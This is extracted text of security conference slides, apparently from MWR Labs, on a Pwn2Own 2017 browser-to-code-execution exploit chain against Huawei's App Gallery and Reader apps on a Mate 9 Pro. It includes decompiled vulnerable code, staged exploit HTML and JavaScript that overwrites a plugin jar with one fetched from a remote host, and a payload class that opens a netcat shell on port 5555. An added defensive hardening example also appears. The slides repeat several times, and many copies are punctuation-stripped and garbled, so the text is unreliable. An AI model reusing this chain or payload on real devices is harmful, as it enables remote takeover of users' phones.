It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader – Insecure Plugin Loading
49
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"plugins/DFService/classes.jar","FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
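The two Reader slides above share one root cause: a file name taken straight from the JSON is appended to PATH.getBookDir() and then handed to FILE.delete() (slide 45), and the plugin jar under that same writable tree is handed to DexClassLoader with no integrity check (slide 48). The Java below is an added example, not code from the Huawei Reader app or from the MWR slides; it shows the defensive counterparts a reviewer would ask for: canonical-path containment before any file operation on an untrusted name, and loading a plugin only from app-private storage after its SHA-256 matches a digest the app ships. The class, method and directory names (SafePluginLoader, resolveInside, deleteBookFile, loadVerifiedPlugin, the "plugins" and "dex_opt" directories) are assumptions made for the example.

```java
// Added example (not code from the Huawei Reader app or the MWR slides):
// hardened counterparts of the delete and plugin-load patterns shown above.
// All names here (SafePluginLoader, resolveInside, loadVerifiedPlugin,
// the "plugins" and "dex_opt" directories) are illustrative assumptions.
package example.hardening;

import android.content.Context;
import dalvik.system.DexClassLoader;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Locale;

public final class SafePluginLoader {

    private SafePluginLoader() {}

    /**
     * Resolve an untrusted, attacker-influenced name inside baseDir.
     * Canonicalising both sides defeats "../" segments, absolute paths and
     * symlinks; the trailing separator stops "/books" matching "/books2".
     */
    public static File resolveInside(File baseDir, String untrustedName) throws IOException {
        File base = baseDir.getCanonicalFile();
        File target = new File(base, untrustedName).getCanonicalFile();
        String prefix = base.getPath() + File.separator;
        if (!target.getPath().startsWith(prefix)) {
            throw new IOException("path escapes " + base + ": " + untrustedName);
        }
        return target;
    }

    /** Contained form of the delete in onChapPack(): resolve and check first, then delete. */
    public static boolean deleteBookFile(File bookDir, String fileName) throws IOException {
        return resolveInside(bookDir, fileName).delete();
    }

    /** Lower-case hex SHA-256 of a file's contents. */
    public static String sha256Hex(File f) throws IOException {
        MessageDigest md;
        try {
            md = MessageDigest.getInstance("SHA-256");
        } catch (NoSuchAlgorithmException e) {
            throw new IOException(e);
        }
        try (InputStream in = new FileInputStream(f)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) > 0) {
                md.update(buf, 0, n);
            }
        }
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest()) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    /**
     * Verified form of loadPlug(): the jar must live under the app's private
     * files directory (never /sdcard), its name must not escape that directory,
     * and its digest must equal the value the app ships for that plugin.
     */
    public static Class<?> loadVerifiedPlugin(Context ctx, String jarName,
                                              String expectedSha256Hex,
                                              String className) throws Exception {
        File pluginDir = new File(ctx.getFilesDir(), "plugins");   // app-private storage
        File jar = resolveInside(pluginDir, jarName);
        byte[] actual = sha256Hex(jar).getBytes(StandardCharsets.US_ASCII);
        byte[] expected = expectedSha256Hex.toLowerCase(Locale.ROOT)
                                           .getBytes(StandardCharsets.US_ASCII);
        if (!MessageDigest.isEqual(actual, expected)) {      // constant-time compare
            throw new SecurityException("plugin digest mismatch for " + jar.getName());
        }
        // dexOutputDir is still a constructor argument but has been ignored since API 26.
        File optDir = ctx.getDir("dex_opt", Context.MODE_PRIVATE);
        DexClassLoader loader = new DexClassLoader(jar.getPath(), optDir.getPath(),
                                                   null, ctx.getClassLoader());
        return loader.loadClass(className);
    }
}
```

Hashing a file and then loading it from the same path still leaves a check-then-use window if any other process can write to that path, which is why the example refuses external storage entirely and reads only under getFilesDir(); a downloaded update should be copied into that private directory, verified there, and only then loaded. The same resolveInside() check applied before the FILE.delete() calls on slide 45 would have removed the arbitrary-delete primitive regardless of how the openfail marker was created.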
Huawei Reader – Payload Creation
50
com.zhangyue.iReader.PlugService.DocFeature
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

public class DocFeature {
    public DocFeature() {
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox "
                + "nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller -
  https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website
  (https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader – Insecure Plugin Loading
49
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"ChargingFeeType":0,' +
        '"OrderUrl":"http://192.168.137.18:001/aaaaa","Price":0,' +
        '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,' +
        '"FileId":' + PLUGIN_FILE_ID + ',' +
        '"FileName":"plugins/DFService/classes.jar","FileSize":10000000,' +
        '"Ebk3DownloadUrl":"' + PLUGIN_URI + '",' +
        '"DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Huawei Reader – Payload Creation
50
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

public class DocFeature {
    public DocFeature() {
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox " +
                "nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller - https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-androidnew-blog-post
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website
(https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PUBLIC
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
• Android: what do we care about?
  – BROWSABLE intents (need to be web accessible) and Intents
  – Content we can load into the applications (either via a WebView or media)
  – Controlled file writes / reads
  – Unsafe class loading
Increasing the attack surface
How do we get more things accessible?
• Intent Proxy Bugs
• MITM stuff (SSL weaknesses)
Intent Proxy Example
• Android Vending (the Play Store, com.android.vending) – LaunchUrlHandlerActivity
• We control the package name and URI:

    final Intent a(Intent arg17, b arg18, j arg19) {
        Intent v2_1;
        Uri v7 = arg17.getData();
        String v8 = v7.getQueryParameter("url");
        String v10 = v7.getQueryParameter("id");
        …
        if((v5) && (v12)) {
            v2_1 = new Intent("android.intent.action.VIEW");
            v2_1.setData(Uri.parse(v8));
            v2_1.setPackage(v10);
            return v2_1;
        }
        …
Toolset (Static Analysis)
• Rezord (internal) – mass de-compilation of all apps
• JEB
• Grep

'Jandroid' – Static analysis
(three slides of tool screenshots; not reproduced in this export)
• For more info see the Chainspotting: Building Exploit Chains with Logic Bugs slides:
  https://infiltratecon.com/archives/[Infiltrate]%20Geshev%20and%20Miller%20-%20Logic%20Bug%20Hunting%20in%20Chrome%20on%20Android.pdf
Dynamic Analysis Toolset
Xposed and Frida compared on: Global Hook, Flexible, Requires Root, Lightweight (the slide's tick marks did not survive export)
• Xposed
  – Early injection (Zygote)
  – Global hooks across multiple applications
• Frida
  – Quick and easy prototyping
  – Debugging and dynamic analysis of obfuscated code
Vulnerabilities
Building an Exploit Chain
• So what do we need to do?
• Assuming no memory corruption
• BROWSABLE Intent, URI handler etc.

Browse to Website on Device → … → Code Exec and Profit
HiApp – Huawei Market Place (App Gallery)

HiApp – Whitelist Bypass (CVE-2018-7931)
    <activity android:configChanges="orientation|screenSize"
        android:launchMode="singleTop"
        android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
        android:theme="@style/loading_activity_style">
        <intent-filter>
            <action android:name="android.intent.action.VIEW" />
            <category android:name="android.intent.category.DEFAULT" />
            <category android:name="android.intent.category.BROWSABLE" />
            <data android:host="details" android:scheme="appmarket" />
            <data android:host="search" android:scheme="market" />
            <data android:host="a.vmall.com" android:scheme="https" />
            <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
        </intent-filter>
    </activity>
The URL handed to the internal WebView is checked against a whitelist of regular expressions:

    public List b() {
        if(b.a(this.a)) {
            this.a = new ArrayList();
            this.a.clear();
            this.a.add("hicloud.com$");
            this.a.add("vmall.com$");
            this.a.add("huawei.com$");
            …
        Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
        do {
            if(v1.hasNext()) {
                if(v1.next().booleanValue()) {
